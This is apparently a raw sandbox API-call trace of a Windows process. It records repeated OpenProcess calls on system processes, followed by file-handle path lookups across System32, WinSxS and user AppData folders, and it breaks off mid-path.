[0128.684] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.684] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.685] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.685] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.685] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.685] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.685] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.685] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.685] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.685] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.685] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.686] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.686] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.686] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.686] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.686] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.686] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.686] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.686] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.686] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.687] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.687] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.687] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.687] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.687] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.687] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.687] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.687] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.687] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.688] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.688] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.688] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.688] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.688] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.688] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.688] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.688] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.688] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.688] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.689] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.689] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.689] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.689] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.689] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.689] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.689] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.689] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.689] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.690] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.690] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.690] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.690] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.690] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.690] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.690] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.690] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.690] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.691] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.691] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.691] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.691] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.691] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.691] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.691] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.691] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.691] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.691] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.692] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.692] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.692] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.692] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.692] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.693] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.693] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.693] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.693] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.693] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.693] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.693] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.693] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.693] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.693] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.694] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.694] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.695] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.695] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.695] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.695] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.695] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.695] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.695] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.695] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.695] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.695] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.696] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.696] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.696] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.696] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.696] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.696] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.696] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.696] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.696] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.697] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.697] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.697] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.697] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.697] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.697] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.697] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.697] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.697] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.698] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.698] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.698] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.698] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.698] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.698] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.698] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.698] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.698] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.698] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.699] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.699] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.699] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.699] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.699] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.699] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.699] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.699] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.699] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.700] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.701] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.702] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.702] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.702] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.702] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.702] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.702] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.702] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.702] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.702] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0128.703] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0128.704] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0128.704] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0128.704] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0128.704] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0128.704] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0128.704] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0128.705] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0128.705] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0128.705] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0128.705] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0128.705] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0128.705] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0128.705] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0128.705] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0128.705] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0128.706] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0128.706] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0128.706] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0128.706] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0128.706] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0128.707] GetFileType (hFile=0x114) returned 0x1 [0128.707] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\System32") returned 0x17 [0128.709] CloseHandle (hObject=0x114) returned 1 [0128.709] GetFileType (hFile=0xa4) returned 0x1 [0128.709] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\System32") returned 0x17 [0128.712] CloseHandle (hObject=0xa4) returned 1 [0128.712] GetFileType (hFile=0x114) returned 0x1 [0128.712] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a") returned 0x6b [0128.712] CloseHandle (hObject=0x114) returned 1 [0128.713] GetFileType (hFile=0xa4) returned 0x0 [0128.713] CloseHandle (hObject=0xa4) returned 1 [0128.713] GetFileType (hFile=0x114) returned 0x1 [0128.713] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0128.714] CloseHandle (hObject=0x114) returned 1 [0128.714] GetFileType (hFile=0xa4) returned 0x1 [0128.714] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0128.714] CloseHandle (hObject=0xa4) returned 1 [0128.714] GetFileType (hFile=0x114) returned 0x1 [0128.715] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251") returned 0x64 [0128.715] CloseHandle (hObject=0x114) returned 1 [0128.715] GetFileType (hFile=0xa4) returned 0x1 [0128.715] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_0a1fd3a3a768b895") returned 0x64 [0128.716] CloseHandle (hObject=0xa4) returned 1 [0128.716] GetFileType (hFile=0x114) returned 0x1 [0128.716] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0128.717] CloseHandle (hObject=0x114) returned 1 [0128.717] GetFileType (hFile=0xa4) returned 0x1 [0128.717] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0128.718] CloseHandle (hObject=0xa4) returned 1 [0128.718] GetFileType (hFile=0x114) returned 0x1 [0128.718] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0128.719] CloseHandle (hObject=0x114) returned 1 [0128.719] GetFileType (hFile=0xa4) returned 0x1 [0128.719] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0128.720] CloseHandle (hObject=0xa4) returned 1 [0128.720] GetFileType (hFile=0x114) returned 0x1 [0128.720] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0128.720] CloseHandle (hObject=0x114) returned 1 [0128.721] GetFileType (hFile=0xa4) returned 0x1 [0128.721] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\Fonts\\StaticCache.dat") returned 0x24 [0128.721] CloseHandle (hObject=0xa4) returned 1 [0128.721] GetFileType (hFile=0x114) returned 0x1 [0128.722] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3") returned 0x7b [0128.722] CloseHandle (hObject=0x114) returned 1 [0128.722] GetFileType (hFile=0xa4) returned 0x1 [0128.722] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui") returned 0x8c [0128.723] CloseHandle (hObject=0xa4) returned 1 [0128.723] GetFileType (hFile=0x114) returned 0x1 [0128.723] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0128.724] CloseHandle (hObject=0x114) returned 1 [0128.724] GetFileType (hFile=0xa4) returned 0x1 [0128.724] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0128.725] CloseHandle (hObject=0xa4) returned 1 [0128.725] GetFileType (hFile=0x114) returned 0x1 [0128.725] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0128.726] CloseHandle (hObject=0x114) returned 1 [0128.726] GetFileType (hFile=0xa4) returned 0x1 [0128.726] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 0x66 [0128.727] CloseHandle (hObject=0xa4) returned 1 [0128.727] GetFileType (hFile=0x114) returned 0x1 [0128.727] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac") returned 0x73 [0128.728] CloseHandle (hObject=0x114) returned 1 [0128.729] GetFileType (hFile=0xa4) returned 0x1 [0128.729] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries") returned 0x4d [0128.730] CloseHandle (hObject=0xa4) returned 1 [0128.730] GetFileType (hFile=0x114) returned 0x1 [0128.730] GetFinalPathNameByHandleW (in: hFile=0x114, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries") returned 0x4d [0128.731] CloseHandle (hObject=0x114) returned 1 [0128.731] GetFileType (hFile=0xa4) returned 0x1 [0128.731] GetFinalPathNameByHandleW (in: hFile=0xa4, lpszFilePath=0x245f250, cchFilePath=0x400, dwFlags=0x0 | out: lpszFilePath="\\\\?\\C:\\Users\\5p5NrGJn0jS 